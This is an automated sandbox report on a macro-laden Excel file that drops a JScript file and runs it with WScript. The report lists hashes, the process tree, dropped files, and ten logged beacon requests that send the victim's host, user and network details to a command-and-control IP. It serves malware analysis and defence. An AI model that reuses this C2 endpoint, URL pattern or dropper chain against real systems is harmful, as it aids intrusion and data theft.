File name: 00369370.xls
Full analysis: https://app.any.run/tasks/77f93982-6924-40b3-a934-f78a95e2597a
Verdict: Malicious activity
Analysis date: October 19, 2020, 21:51:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Subject: M % fx9SFNFzx0Z, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Oct 19 11:38:48 2020, Security: 0
MD5: 0801310447AC6FF3DB5E3447DFB7EA51
SHA1: 021636550DC9FC56B349C4725CFA016B21EBE3DD
SHA256: 706BCE767F11302A38F1D5EA4FF46C77889925644990970CA1CEE736032B1437
SSDEEP: 12288:H1AI+sRKvwdFWakZGQppX0t4gT7CSPkoAhxLlekoA9lbXrz6tQkoAfNRplkoAIz/:Hh

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Executes scripts
      • EXCEL.EXE (PID: 1336)
    • Unusual execution from Microsoft Office
      • EXCEL.EXE (PID: 1336)
  • SUSPICIOUS
    No suspicious indicators.
  • INFO
    • Reads settings of System Certificates
      • WScript.exe (PID: 1772)
    • Manual execution by user
      • WScript.exe (PID: 3356)
      • notepad++.exe (PID: 3720)
      • explorer.exe (PID: 492)
    • Creates files in the user directory
      • EXCEL.EXE (PID: 1336)
    • Reads Microsoft Office registry keys
      • EXCEL.EXE (PID: 1336)
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Excel 2003 Worksheet
CompObjUserTypeLen: 31
HeadingPairs:
  • Worksheets
  • 2
TitleOfParts:
  • Sheet1
  • Sheet2
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
Company: -
Manager: -
Category: -
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2020:10:19 10:38:48
CreateDate: 2015:06:05 18:17:20
Software: Microsoft Excel
LastModifiedBy: -
Author: -
Subject: M % fx9SFNFzx0Z
No data.
All screenshots are available in the full report
Total processes: 54
Monitored processes: 6
Malicious processes: 1
Suspicious processes: 0

Behavior graph

Process nodes: start, excel.exe (no specs), wscript.exe, explorer.exe (no specs), notepad++.exe, gup.exe, wscript.exe

Process information

PID | CMD | Path | Parent process
1336 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | explorer.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft Excel | Version: 14.0.6024.1000
1772 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\icon.txtense.jse" | C:\Windows\System32\WScript.exe | EXCEL.EXE
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft ® Windows Based Script Host | Version: 5.8.7600.16385
492 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | explorer.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows Explorer | Exit code: 1 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3720 | "C:\Program Files\Notepad++\notepad++.exe" "C:\Users\Public\Documents\icon.txtense.jse" | C:\Program Files\Notepad++\notepad++.exe | explorer.exe
  User: admin | Company: - | Integrity Level: MEDIUM | Description: Notepad++ : a free (GNU) source code editor | Version: 7.51
4044 | "C:\Program Files\Notepad++\updater\gup.exe" -v7.51 | C:\Program Files\Notepad++\updater\gup.exe | notepad++.exe
  User: admin | Company: - | Integrity Level: MEDIUM | Description: GUP : a free (LGPL) Generic Updater | Exit code: 4294967295 | Version: 4.1
3356 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\icon.txtense.jse" | C:\Windows\System32\WScript.exe | explorer.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft ® Windows Based Script Host | Version: 5.8.7600.16385
Total events: 1 151
Read events: 985
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 0
Text files: 4
Unknown types: 3

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
1336 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR43E4.tmp.cvr | - | - | -
1336 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\00369370.xls.LNK | lnk | D844307CE3391E7361899A698E9F970E | A1C636B4F78BEE0B2E516FD07C3871F5340339D82C1A532CAB14697C5FA225E7
1336 | EXCEL.EXE | C:\Users\Public\Documents\icon.txtense.jse | text | AD62B4429562C14D90E217A46F743BAC | 017DCD5B7421FE6FB71B140F3DFD0051846416D87EA26E7C34A2C6D7E7A9EC13
1336 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\Excel8.0\MSForms.exd | tlb | D3C12DD09DD47640A34BD32E646D6772 | 3572936692EA660FAC40DEE2B3B0BC5B6F2B2ED1796780DED9D4B318BFCB8003
1336 | EXCEL.EXE | C:\Users\Public\Documents\icon.txt | text | AD62B4429562C14D90E217A46F743BAC | 017DCD5B7421FE6FB71B140F3DFD0051846416D87EA26E7C34A2C6D7E7A9EC13
1336 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6DA85C2B.emf | emf | A7AB69B742BAEEA6365B31084A55EC0C | 9D86FA02D0E06F4956AFA0EE43A513E9DED87FE1AEB5E7A94CC3881A3311B3D4
1336 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 3E7D7AB0A97664A36C02CEBC0690E921 | 1631F8B21FE820387BDF5D7522CC96DE97BDCF8FA44363B7DCAFC43B400F90E5
HTTP(S) requests: 27
TCP/UDP connections: 3
DNS requests: 1
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&25010062 | PL | suspicious
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&120017734 | PL | suspicious
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&1497019835 | PL | suspicious
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&674521590 | PL | suspicious
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&137075153 | PL | suspicious
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&1470815840 | PL | suspicious
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&8827365 | PL | suspicious
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&123989687 | PL | suspicious
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&16582858 | PL | suspicious
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&908815358 | PL | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3356 | WScript.exe | 188.116.36.154:443 | - | NEPHAX Spolka jawna Arkadiusz Kawalec Michal Podsiadly | PL | suspicious
1772 | WScript.exe | 188.116.36.154:443 | - | NEPHAX Spolka jawna Arkadiusz Kawalec Michal Podsiadly | PL | suspicious
4044 | gup.exe | 104.31.89.28:443 | notepad-plus-plus.org | Cloudflare Inc | US | shared

DNS requests

Domain | IP | Reputation
notepad-plus-plus.org | 104.31.89.28, 172.67.218.84, 104.31.88.28 | whitelisted

Threats

No threats detected
Process | Message
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093